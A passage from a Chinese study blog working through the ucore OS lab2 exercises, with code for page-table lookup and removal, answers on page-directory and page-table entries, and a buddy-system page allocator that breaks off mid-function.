练习2</h3><blockquote><p><strong>实现寻找虚拟地址对应的页表项</strong>.</p></blockquote><blockquote><p>通过设置页表和对应的页表项，可建立虚拟内存地址和物理内存地址的对应关系。</p><p>其中的<code>get_pte</code>函数是设置页表项环节中的一个重要步骤。此函数找到一个虚地址对应的二级页表项的内核虚地址，如果此二级页表项不存在，则分配一个包含此项的二级页表。</p></blockquote><p>以下为实现的代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">pte_t</span> * <span class="title">get_pte</span><span class="params">(<span class="type">pde_t</span> *pgdir, <span class="type">uintptr_t</span> la, <span class="type">bool</span> create)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 获取传入的线性地址中所对应的页目录条目的物理地址</span></span><br><span class="line">    <span class="type">pde_t</span> *pdep = &amp;pgdir[<span class="built_in">PDX</span>(la)];</span><br><span class="line">    <span class="comment">// 如果该条目不可用(not present)</span></span><br><span class="line">    <span class="keyword">if</span> (!(*pdep &amp; PTE_P)) &#123;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">Page</span> *page;</span><br><span class="line">        <span class="comment">// 如果分配页面失败，或者不允许分配，则返回NULL</span></span><br><span class="line">        <span class="keyword">if</span> (!create || (page = <span class="built_in">alloc_page</span>()) == <span class="literal">NULL</span>)</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">NULL</span>;</span><br><span class="line">        <span class="comment">// 设置该物理页面的引用次数为1</span></span><br><span class="line">        <span class="built_in">set_page_ref</span>(page, <span class="number">1</span>);</span><br><span class="line">        <span class="comment">// 获取当前物理页面所管理的物理地址</span></span><br><span class="line">        <span class="type">uintptr_t</span> pa = <span class="built_in">page2pa</span>(page);</span><br><span class="line">        <span class="comment">// 清空该物理页面的数据。需要注意的是使用虚拟地址</span></span><br><span class="line">        <span class="built_in">memset</span>(<span class="built_in">KADDR</span>(pa), <span class="number">0</span>, PGSIZE);</span><br><span class="line">        <span class="comment">// 将新分配的页面设置为当前缺失的页目录条目中</span></span><br><span class="line">        <span class="comment">// 之后该页面就是其中的一个二级页面</span></span><br><span class="line">        *pdep = pa | PTE_U | PTE_W | PTE_P;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 返回在pgdir中对应于la的二级页表项</span></span><br><span class="line">    <span class="keyword">return</span> &amp;((<span class="type">pte_t</span> *)<span class="built_in">KADDR</span>(<span class="built_in">PDE_ADDR</span>(*pdep)))[<span class="built_in">PTX</span>(la)];</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><ul><li><p>请描述页目录项（Pag Director Entry）和页表（Page Table Entry）中每个组成部分的含义和以及对ucore而言的潜在用处。</p><blockquote><p>请查看<a href="#d-%E8%99%9A%E6%8B%9F%E9%A1%B5%E8%A1%A8%E7%BB%93%E6%9E%84">虚拟页表结构</a></p></blockquote></li><li><p>如果ucore执行过程中访问内存，出现了页访问异常，请问硬件要做哪些事情？</p><blockquote><p>以下答案参考了其他blog，具体细节留待以后再来研究。</p></blockquote><ul><li>将引发页访问异常的地址将被保存在cr2寄存器中</li><li>设置错误代码</li><li>引发Page Fault，将外存的数据换到内存中</li><li>进行上下文切换，退出中断，返回到中断前的状态</li></ul></li></ul><h3 id="4-练习3">4) 练习3</h3><blockquote><p><strong>释放某虚地址所在的页并取消对应二级页表项的映射</strong>.</p></blockquote><blockquote><p>当释放一个包含某虚地址的物理内存页时，需要让对应此物理内存页的管理数据结构Page做相关的清除处理，使得此物理内存页成为空闲；另外还需把表示虚地址与物理地址对应关系的二级页表项清除。</p></blockquote><p>这个练习不是很难，对着注释完成即可。以下为实现的代码：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//page_remove_pte - free an Page sturct which is related linear address la</span></span><br><span class="line"><span class="comment">//                - and clean(invalidate) pte which is related linear address la</span></span><br><span class="line"><span class="comment">//note: PT is changed, so the TLB need to be invalidate</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="keyword">inline</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">page_remove_pte</span><span class="params">(<span class="type">pde_t</span> *pgdir, <span class="type">uintptr_t</span> la, <span class="type">pte_t</span> *ptep)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 如果传入的页表条目是可用的</span></span><br><span class="line">    <span class="keyword">if</span> (*ptep &amp; PTE_P) &#123;</span><br><span class="line">        <span class="comment">// 获取该页表条目所对应的地址</span></span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">Page</span> *page = <span class="built_in">pte2page</span>(*ptep);</span><br><span class="line">        <span class="comment">// 如果该页的引用次数在减1后为0</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">page_ref_dec</span>(page) == <span class="number">0</span>)</span><br><span class="line">            <span class="comment">// 释放当前页</span></span><br><span class="line">            <span class="built_in">free_page</span>(page);</span><br><span class="line">        <span class="comment">// 清空PTE</span></span><br><span class="line">        *ptep = <span class="number">0</span>;</span><br><span class="line">        <span class="comment">// 刷新TLB内的数据</span></span><br><span class="line">        <span class="built_in">tlb_invalidate</span>(pgdir, la);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><ul><li><p>数据结构Page的全局变量（其实是一个数组）的每一项与页表中的页目录项和页表项有无对应关系？如果有，其对应关系是啥？</p><ul><li><p>当页目录项或页表项有效时，Page数组中的项与页目录项或页表项存在对应关系。</p></li><li><p>页目录表中存放着数个页表条目PTE，这些页表条目中存放了某个二级页表所在物理页的信息，包括该二级页表的<strong>物理地址</strong>，但使用<strong>线性地址</strong>的头部PDX(Page Directory Index)来索引页目录表。</p><blockquote><p>总结一下，页目录表内存放二级页表的<strong>物理地址</strong>，但却使用<strong>线性地址</strong>索引页目录表中的条目。</p></blockquote></li><li><p>而页表（二级页表）与页目录（一级页表）具有类似的特性，页表中的页表项指向所管理的物理页的<strong>物理地址</strong>（不是数据结构Page的地址），使用线性地址的中部PTX(Page Table Index)来索引页表。</p></li><li><p>当二级页表获取物理页时，需要对该物理页所对应的数据结构page来做一些操作。其操作包括但不限于设置引用次数，这样方便共享内存。</p></li></ul><blockquote><p>为什么页目录表中存放的是<strong>物理</strong>地址呢？可能是为了防止递归查找。</p><p>即原先查找页目录表的目的是想将某个线性地址转换为物理地址，但如果页目录表中存放的是二级页表的<strong>线性</strong>地址，则需要先查找该二级页表的物理地址，此时需要递归查找，这可能会出现永远也查找不到物理地址的情况。</p></blockquote></li><li><p>如果希望虚拟地址与物理地址相等，则需要如何修改lab2，完成此事？ <strong>鼓励通过编程来具体完成这个问题</strong></p><ul><li><p>将<code>labcodes/lab2/tools/kernel.ld</code>中的加载地址从<code>0xC0100000</code>修改为<code>0x0</code></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 修改前</span></span><br><span class="line">. = <span class="number">0xC0100000</span>;</span><br><span class="line"><span class="comment">// 修改后</span></span><br><span class="line">. = <span class="number">0x0</span>;</span><br></pre></td></tr></table></figure></li><li><p>将<code>mm/</code>中的内核偏移地址修改为0</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 修改前</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> KERNBASE            0xC0000000</span></span><br><span class="line"><span class="comment">// 修改后</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> KERNBASE            0x0</span></span><br></pre></td></tr></table></figure></li><li><p>最后一步，但也是必须要做的一步——<strong>关闭页机制</strong>。将开启页机制的那一段代码删除或注释掉最后一句即可。</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># 修改后</span><br><span class="line">movl %cr0, %eax</span><br><span class="line">orl $(CR0_PE | CR0_PG | CR0_AM | CR0_WP | CR0_NE | CR0_TS | CR0_EM | CR0_MP), %eax</span><br><span class="line">andl $~(CR0_TS | CR0_EM), %eax</span><br><span class="line"># 注释了最后一句</span><br><span class="line"># movl %eax, %cr0</span><br></pre></td></tr></table></figure><blockquote><p>为什么要关闭页机制？只将偏移地址设置为0不够么？这是个值得探讨的问题。</p><p>注意到<code>kern/init.entry.S</code>中有这样一段代码</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">next:</span></span><br><span class="line">  # unmap va <span class="number">0</span> ~ 4M, it<span class="string">&#x27;s temporary mapping</span></span><br><span class="line"><span class="string">  xorl %eax, %eax</span></span><br><span class="line"><span class="string">  movl %eax, __boot_pgdir</span></span><br></pre></td></tr></table></figure><p>当CPU完成了<code>eip</code>的地址更新后，这两条指令会删除页目录表中的一个<strong>临时</strong>映射（va 0 ~ 4M to pa 0 ~ 4M）</p><p>但一旦删除了这个临时映射后，CPU无法正常寻址，即便页目录表中还有一个映射（va KERNBASE + (0 ~ 4M) to pa 0 ~ 4M， 注意KERNBASE为0）</p><p>但只要基地址不为0，则不会出错。</p><p>具体的问题在哪呢？或许，需要查询一下intel 80386的相关手册。</p></blockquote></li></ul></li></ul><h3 id="5-扩展练习">5) 扩展练习</h3><h4 id="Challenge1">Challenge1</h4><blockquote><p><strong>buddy system（伙伴系统）分配算法</strong></p><p>Buddy System算法把系统中的可用存储空间划分为存储块(Block)来进行管理, 每个存储块的大小必须是2的n次幂(Pow(2, n)), 即1, 2, 4, 8, 16, 32, 64, 128…</p></blockquote><h5 id="a-前置准备">a. 前置准备</h5><p>伙伴系统中每个存储块的大小都必须是2的n次幂，所以其中必须有个<strong>可以将传入数转换为最接近该数的2的n次幂</strong>的函数，相关代码如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 传入一个数，返回最接近该数的2的指数（包括该数为2的整数这种情况）</span></span><br><span class="line"><span class="function"><span class="type">size_t</span> <span class="title">getLessNearOfPower2</span><span class="params">(<span class="type">size_t</span> x)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">size_t</span> _i;</span><br><span class="line">    <span class="keyword">for</span>(_i = <span class="number">0</span>; _i &lt; <span class="built_in">sizeof</span>(<span class="type">size_t</span>) * <span class="number">8</span> - <span class="number">1</span>; _i++)</span><br><span class="line">        <span class="keyword">if</span>((<span class="number">1</span> &lt;&lt; (_i<span class="number">+1</span>)) &gt; x)</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">return</span> (<span class="type">size_t</span>)(<span class="number">1</span> &lt;&lt; _i);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h5 id="b-初始化">b. 初始化</h5><p>初始时，程序会多次将一块尺寸很大的物理内存空间传入<code>init_memmap</code>函数，但该物理内存空间的大小却不一定是2的n次幂，所以需要对其进行分割。设定分割后的内存布局如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">buddy system中的内存布局</span></span><br><span class="line"><span class="comment">      某块较大的物理空间</span></span><br><span class="line"><span class="comment">低地址                              高地址</span></span><br><span class="line"><span class="comment">+-+--+----+--------+-------------------+</span></span><br><span class="line"><span class="comment">| |  |    |        |                   |</span></span><br><span class="line"><span class="comment">+-+--+----+--------+-------------------+</span></span><br><span class="line"><span class="comment">低地址的内存块较小             高地址的内存块较大</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure><p>同时，在双向链表<code>free_area.free_list</code>中，令空间较小的内存块在双向链表中靠前，空间较大的内存块在双向链表中靠后；低地址在前，高地址在后。故以下是最终的链表布局：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">free_area.free_list中的内存块顺序:</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">1. 一大块连续物理内存被切割后，free_area.free_list中的内存块顺序</span></span><br><span class="line"><span class="comment">    addr: 0x34       0x38           0x40</span></span><br><span class="line"><span class="comment">        +----+     +--------+     +---------------+</span></span><br><span class="line"><span class="comment">    &lt;-&gt; | 0x4| &lt;-&gt; | 0x8    | &lt;-&gt; |     0x10      | &lt;-&gt;</span></span><br><span class="line"><span class="comment">        +----+     +--------+     +---------------+</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">2. 几大块物理内存（这几块之间可能不连续）被切割后，free_area.free_list中的内存块顺序</span></span><br><span class="line"><span class="comment">    addr: 0x34       0x104       0x38           0x108          0x40                 0x110</span></span><br><span class="line"><span class="comment">        +----+     +----+     +--------+     +--------+     +---------------+     +---------------+</span></span><br><span class="line"><span class="comment">    &lt;-&gt; | 0x4| &lt;-&gt; | 0x4| &lt;-&gt; | 0x8    | &lt;-&gt; | 0x8    | &lt;-&gt; |     0x10      | &lt;-&gt; |     0x10      | &lt;-&gt;</span></span><br><span class="line"><span class="comment">        +----+     +----+     +--------+     +--------+     +---------------+     +---------------+</span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure><p>根据上面的内存规划，可以得到<code>buddy_init_memmap</code>的代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">buddy_init_memmap</span><span class="params">(<span class="keyword">struct</span> Page *base, <span class="type">size_t</span> n)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">assert</span>(n &gt; <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 设置当前页向后的curr_n个页</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">Page</span> *p = base;</span><br><span class="line">    <span class="keyword">for</span> (; p != base + n; p ++) &#123;</span><br><span class="line">        <span class="built_in">assert</span>(<span class="built_in">PageReserved</span>(p));</span><br><span class="line">        p-&gt;flags = p-&gt;property = <span class="number">0</span>;</span><br><span class="line">        <span class="built_in">set_page_ref</span>(p, <span class="number">0</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 设置总共的空闲内存页面</span></span><br><span class="line">    nr_free += n;</span><br><span class="line">    <span class="comment">// 设置base指向尚未处理内存的end地址</span></span><br><span class="line">    base += n;</span><br><span class="line">    <span class="keyword">while</span>(n != <span class="number">0</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">size_t</span> curr_n = <span class="built_in">getLessNearOfPower2</span>(n);</span><br><span class="line">        <span class="comment">// 向前挪一块</span></span><br><span class="line">        base -= curr_n;</span><br><span class="line">        <span class="comment">// 设置free pages的数量</span></span><br><span class="line">        base-&gt;property = curr_n;</span><br><span class="line">        <span class="comment">// 设置当前页为可用</span></span><br><span class="line">        <span class="built_in">SetPageProperty</span>(base);</span><br><span class="line">        <span class="comment">// 按照块的大小来插入空闲块，从小到大排序</span></span><br><span class="line">        <span class="comment">// @note 这里必须使用搜索的方式来插入块而不是直接list_add_after(&amp;free_list)，因为存在大的内存块不相邻的情况</span></span><br><span class="line">        <span class="type">list_entry_t</span>* le;</span><br><span class="line">        <span class="keyword">for</span>(le = <span class="built_in">list_next</span>(&amp;free_list); le != &amp;free_list; le = <span class="built_in">list_next</span>(le))</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">struct</span> <span class="title class_">Page</span> *p = <span class="built_in">le2page</span>(le, page_link);</span><br><span class="line">            <span class="comment">// 排序方式以内存块大小优先，地址其次。</span></span><br><span class="line">            <span class="keyword">if</span>((p-&gt;property &gt; base-&gt;property)</span><br><span class="line">                 || (p-&gt;property ==  base-&gt;property &amp;&amp; p &gt; base))</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="built_in">list_add_before</span>(le, &amp;(base-&gt;page_link));</span><br><span class="line">        n -= curr_n;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h5 id="c-空间分配">c. 空间分配</h5><p>分配空间时，遍历双向链表，查找大小合适的内存块。</p><ul><li><p>若链表中不存在合适大小的内存块，则<strong>对半切割</strong>遍历过程中遇到的第一块大小大于所需空间的内存块。</p></li><li><p>如果切割后的两块内存块的大小还是太大，则继续切割<strong>第一块</strong>内存块。</p></li><li><p>循环该操作，直至切割出合适大小的内存块。</p></li><li><p>最终<code>buddy_alloc_pages</code>代码如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">Page</span> *</span><br><span class="line"><span class="built_in">buddy_alloc_pages</span>(<span class="type">size_t</span> n) &#123;</span><br><span class="line">    <span class="built_in">assert</span>(n &gt; <span class="number">0</span>);</span><br><span class="line">    <span class="comment">// 向上取2的幂次方，如果当前数为2的幂次方则不变</span></span><br><span class="line">    <span class="type">size_t</span> lessOfPower2 = <span class="built_in">getLessNearOfPower2</span>(n);</span><br><span class="line">    <span class="keyword">if</span> (lessOfPower2 &lt; n)</span><br><span class="line">        n = <span class="number">2</span> * lessOfPower2;</span><br><span class="line">    <span class="comment">// 如果待分配的空闲页面数量小于所需的内存数量</span></span><br><span class="line">    <span class="keyword">if</span> (n &gt; nr_free) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">NULL</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 查找符合要求的连续页</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">Page</span> *page = <span class="literal">NULL</span>;</span><br><span class="line">    <span class="type">list_entry_t</span> *le = &amp;free_list;</span><br><span class="line">    <span class="keyword">while</span> ((le = <span class="built_in">list_next</span>(le)) != &amp;free_list) &#123;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">Page</span> *p = <span class="built_in">le2page</span>(le, page_link);</span><br><span class="line">        <span class="keyword">if</span> (p-&gt;property &gt;= n) &#123;</span><br><span class="line">            page = p;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 如果需要切割内存块时，一定分配切割后的前面那块</span></span><br><span class="line">    <span class="keyword">if</span> (page != <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="comment">// 如果内存块过大，则持续切割内存</span></span><br><span class="line">        <span class="keyword">while</span>(page-&gt;property &gt; n)</span><br><span class="line">        &#123;</span><br><span class="line">            page-&gt;property /= <span class="number">2</span>;</span><br><span class="line">            <span class="comment">// 切割出的右边那一半内存块不用于内存分配</span></span><br><span class="line">            <span class="keyword">struct</span> <span class="title class_">Page</span> *p = page + page-&gt;property;</span><br><span class="line">            p-&gt;property = page-&gt;property;</span><br><span class="line">            <span class="built_in">SetPageProperty</span>(p);</span><br><span class="line">            <span class="built_in">list_add_after</span>(&amp;(page-&gt;page_link), &amp;(p-&gt;page_link));</span><br><span class="line">        &#125;</span><br><span class="line">        nr_free -= n;</span><br><span class="line">        <span class="built_in">ClearPageProperty</span>(page);</span><br><span class="line">        <span class="built_in">assert</span>(page-&gt;property == n);</span><br><span class="line">        <span class="built_in">list_del</span>(&amp;(page-&gt;page_link));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> page;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h5 id="d-内存释放">d. 内存释放</h5><p>释放内存时</p><ul><li><p>先将该内存块按照<strong>内存块大小从小到大与内存块地址从小到大</strong>的顺序插入至双向链表（具体请看上面的链表布局）。</p></li><li><p>尝试向前合并，一次就够。如果向前合并成功，则一定不能再次向前合并。</p></li><li><p>之后循环向后合并，直至无法合并。</p><blockquote><p>需要注意的是，在查找两块内存块能否合并时，若当前内存块合并过，则其大小会变为原来的2倍，此时需要遍历比原始大小（合并前内存块大小）更大的内存块。</p></blockquote></li><li><p>判断当前内存块的位置是否正常，如果不正常，则需要断开链表并重新插入至新的位置。</p><blockquote><p>如果当前内存块没有合并则肯定正常，如果合并过则<strong>不一定异常</strong>。</p></blockquote></li><li><p>最终代码如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">buddy_free_pages</span><span class="params">(<span class="keyword">struct</span> Page *base, <span class="type">size_t</span> n)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">assert</span>(n &gt; <span class="number">0</span>);</span><br><span class="line">    <span class="comment">// 向上取2的幂次方，如果当前数为2的幂次方则不变</span></span><br><span class="line">    <span class="type">size_t</span> lessOfPower2 = <span class="built_in">getLessNearOfPower2</span>(n);</span><br><span class="line">    <span class="keyword">if</span> (lessOfPower2 &lt; n)</span><br><span class="line">        n = <span class="number">2</span> * lessOfPower2;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">Page</span> *p = base;</span><br><span class="line">    <span class="keyword">for</span> (; p != base + n; p ++) &#123;</span><br><span class="line">        <span class="built_in">assert</span>(!<span class="built_in">PageReserved</span>(p) &amp;&amp; !<span class="built_in">PageProperty</span>(p));</span><br><span class="line">        p-&gt;flags = <span class="number">0</span>;</span><br><span class="line">        <span class="built_in">set_page_ref</span>(p, <span class="number">0</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    base-&gt;property = n;</span><br><span class="line">    <span class="built_in">SetPageProperty</span>(base);</span><br><span class="line">    nr_free += n;</span><br><span class="line">    <span class="type">list_entry_t</span> *le;</span><br><span class="line">    <span class="comment">// 先插入至链表中</span></span><br><span class="line">    <span class="keyword">for</span>(le = <span class="built_in">list_next</span>(&amp;free_list); le != &amp;free_list; le = <span class="built_in">list_next</span>(le))</span><br><span class="line">    &#123;</span><br><span class="line">        p = <span class="built_in">le2page</span>(le, page_link);</span><br><span class="line">        <span class="keyword">if</span> ((base-&gt;property &lt;= p-&gt;property)</span><br><span class="line">                 || (p-&gt;property ==  base-&gt;property &amp;&amp; p &gt; base))) &#123;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">list_add_before</span>(le, &amp;(base-&gt;page_link));</span><br><span class="line">    <span class="comment">// 先向左合并</span></span><br><span class="line">    <span class="keyword">if</span>(base-&gt;property == p-&gt;property &amp;&amp; p + p-&gt;property == base) &#123;</span><br><span class="line">        p-&gt;property += base-&gt;property;</span><br><span class="line">        <span class="built_in">ClearPageProperty</span>(base);</span><br><span class="line">        <span class="built_in">list_del</span>(&amp;(base-&gt;page_link));</span><br><span class="line">        base = p;</span><br><span class="line">        le = &amp;(base-&gt;page_link);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 之后循环向后合并</span></span><br><span class="line">    <span class="comment">// 此时的le指向插入块的下一个块</span></span><br><span class="line">    <span class="keyword">while</span> (le != &amp;free_list) &#123;</span><br><span class="line">        p = <span class="built_in">le2page</span>(le, page_link);</span><br><span class="line">        <span class="comment">// 如果可以合并(大小相等+地址相邻),则合并</span></span><br><span class="line">        <span class="comment">// 如果两个块的大小相同，则它们不一定内存相邻。</span></span><br><span class="line">        <span class="comment">// 也就是说，在一条链上，可能存在多个大小相等但却无法合并的块</span></span><br><span class="line">        <span class="keyword">if</span> (base-&gt;property == p-&gt;property &amp;&amp; base + base-&gt;property == p)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// 向右合并</span></span><br><span class="line">            base-&gt;property += p-&gt;property;</span><br><span class="line">            <span class="built_in">ClearPageProperty</span>(p);</span><br><span class="line">            <span class="built_in">list_del</span>(&amp;(p-&gt;page_link));</span><br><span class="line">            le = &amp;(base-&gt;page_link);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 如果遍历到的内存块一定无法合并，则退出</span></span><br><span class="line">        <span class="keyword">else</span> <span class="keyword">if</span>(base-&gt;property &lt; p-&gt;property)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// 如果合并不了，则需要修改base在链表中的位置，使大小相同的聚在一起</span></span><br><span class="line">            <span class="type">list_entry_t</span>* targetLe = <span class="built_in">list_next</span>(&amp;base-&gt;page_link);</span><br><span class="line">            p = <span class="built_in">le2page</span>(targetLe, page_link);</span><br><span class="line">            <span class="keyword">while</span>(p-&gt;property &lt; 